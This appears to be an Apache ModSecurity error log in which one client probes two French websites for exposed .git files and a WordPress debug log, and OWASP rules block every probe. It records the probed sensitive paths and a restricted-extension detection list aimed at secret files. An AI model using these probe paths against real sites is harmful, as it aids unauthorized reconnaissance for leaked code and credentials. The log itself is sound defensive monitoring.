[Mon May 11 11:49:27.046619 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:27702] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks/pre-commit"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/hooks/pre-commit"] [unique_id "agGmJ74KNmD_mZ_vlf84EwAAAFg"]
[Mon May 11 11:49:27.046949 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:27702] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/hooks/pre-commit"] [unique_id "agGmJ74KNmD_mZ_vlf84EwAAAFg"]
[Mon May 11 11:49:28.240965 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:27702] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmJ74KNmD_mZ_vlf84EwAAAFg"]
[Mon May 11 11:49:28.268410 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:27704] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks/pre-commit"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/hooks/pre-commit"] [unique_id "agGmKGS6k_SCYd1AVZqtQQAAAQY"]
[Mon May 11 11:49:28.268959 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:27704] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/hooks/pre-commit"] [unique_id "agGmKGS6k_SCYd1AVZqtQQAAAQY"]
[Mon May 11 11:49:29.506866 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:27704] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmKGS6k_SCYd1AVZqtQQAAAQY"]
[Mon May 11 11:49:29.538081 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:27716] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks/post-commit"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/hooks/post-commit"] [unique_id "agGmKZkIEwRJMyDaV55N2wAAAVg"]
[Mon May 11 11:49:29.538623 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:27716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/hooks/post-commit"] [unique_id "agGmKZkIEwRJMyDaV55N2wAAAVg"]
[Mon May 11 11:49:30.738515 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:27716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmKZkIEwRJMyDaV55N2wAAAVg"]
[Mon May 11 11:49:30.778521 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:27730] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks/post-commit"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/hooks/post-commit"] [unique_id "agGmKpkIEwRJMyDaV55N3AAAAUg"]
[Mon May 11 11:49:30.778822 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:27730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/hooks/post-commit"] [unique_id "agGmKpkIEwRJMyDaV55N3AAAAUg"]
[Mon May 11 11:49:31.998902 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:27730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmKpkIEwRJMyDaV55N3AAAAUg"]
[Mon May 11 11:49:32.031358 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:27744] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/info"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/objects/info"] [unique_id "agGmLL4KNmD_mZ_vlf84FwAAAFI"]
[Mon May 11 11:49:32.031857 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:27744] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/objects/info"] [unique_id "agGmLL4KNmD_mZ_vlf84FwAAAFI"]
[Mon May 11 11:49:32.501904 2026] [ssl:error] [pid 1256241:tid 1256259] (EAI 2)Name or service not known: [client 49.51.204.74:47902] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:49:32.502220 2026] [ssl:error] [pid 1256241:tid 1256259] AH01941: stapling_renew_response: responder error
[Mon May 11 11:49:32.862495 2026] [security2:error] [pid 1256241:tid 1256259] [client 49.51.204.74:47902] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.happy-baby-box.fr"] [uri "/"] [unique_id "agGmLJkIEwRJMyDaV55N5AAAAU0"], referer: http://www.happy-baby-box.fr
[Mon May 11 11:49:33.218948 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:27744] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmLL4KNmD_mZ_vlf84FwAAAFI"]
[Mon May 11 11:49:33.250337 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:58674] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/info"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/objects/info"] [unique_id "agGmLRjZymfuKpjWXeh7MwAAANE"]
[Mon May 11 11:49:33.250630 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:58674] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/objects/info"] [unique_id "agGmLRjZymfuKpjWXeh7MwAAANE"]
[Mon May 11 11:49:34.480048 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:58674] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmLRjZymfuKpjWXeh7MwAAANE"]
[Mon May 11 11:49:34.510859 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:58686] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/pack"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/objects/pack"] [unique_id "agGmLkRdw2n9wv6Ai48HpAAAAIE"]
[Mon May 11 11:49:34.511622 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:58686] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/objects/pack"] [unique_id "agGmLkRdw2n9wv6Ai48HpAAAAIE"]
[Mon May 11 11:49:35.424309 2026] [ssl:error] [pid 1254133:tid 1254146] (EAI 2)Name or service not known: [client 49.51.204.74:51886] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:49:35.424552 2026] [ssl:error] [pid 1254133:tid 1254146] AH01941: stapling_renew_response: responder error
[Mon May 11 11:49:35.719107 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:58686] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmLkRdw2n9wv6Ai48HpAAAAIE"]
[Mon May 11 11:49:35.745820 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:58692] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/pack"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/objects/pack"] [unique_id "agGmL74KNmD_mZ_vlf84GQAAAE0"]
[Mon May 11 11:49:35.746246 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:58692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/objects/pack"] [unique_id "agGmL74KNmD_mZ_vlf84GQAAAE0"]
[Mon May 11 11:49:35.795284 2026] [security2:error] [pid 1254133:tid 1254146] [client 49.51.204.74:51886] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.happy-baby-box.fr"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agGmLxjZymfuKpjWXeh7NAAAAMo"], referer: https://www.happy-baby-box.fr/
[Mon May 11 11:49:36.979738 2026] [security2:error] [pid 1254242:tid 1254258] [client 185.177.72.9:58692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmL74KNmD_mZ_vlf84GQAAAE0"]
[Mon May 11 11:49:37.008389 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:58694] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /app/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/app/.git/config"] [unique_id "agGmMUYQeUtAPynIs6xXdAAAAAU"]
[Mon May 11 11:49:37.008717 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/app/.git/config"] [unique_id "agGmMUYQeUtAPynIs6xXdAAAAAU"]
[Mon May 11 11:49:38.192336 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmMUYQeUtAPynIs6xXdAAAAAU"]
[Mon May 11 11:49:38.220071 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:58704] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /app/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/app/.git/config"] [unique_id "agGmMmS6k_SCYd1AVZqtSgAAAQM"]
[Mon May 11 11:49:38.221195 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:58704] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/app/.git/config"] [unique_id "agGmMmS6k_SCYd1AVZqtSgAAAQM"]
[Mon May 11 11:49:39.453320 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:58704] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmMmS6k_SCYd1AVZqtSgAAAQM"]
[Mon May 11 11:50:11.611068 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:28568] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/wp-content/debug.log"] [unique_id "agGmU0Rdw2n9wv6Ai48HyQAAAJM"]
[Mon May 11 11:50:11.611787 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:28568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-content/debug.log"] [unique_id "agGmU0Rdw2n9wv6Ai48HyQAAAJM"]
[Mon May 11 11:50:13.820835 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:28568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmU0Rdw2n9wv6Ai48HyQAAAJM"]
[Mon May 11 11:50:13.846769 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:41574] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/wp-content/debug.log"] [unique_id "agGmVRjZymfuKpjWXeh7lQAAANI"]
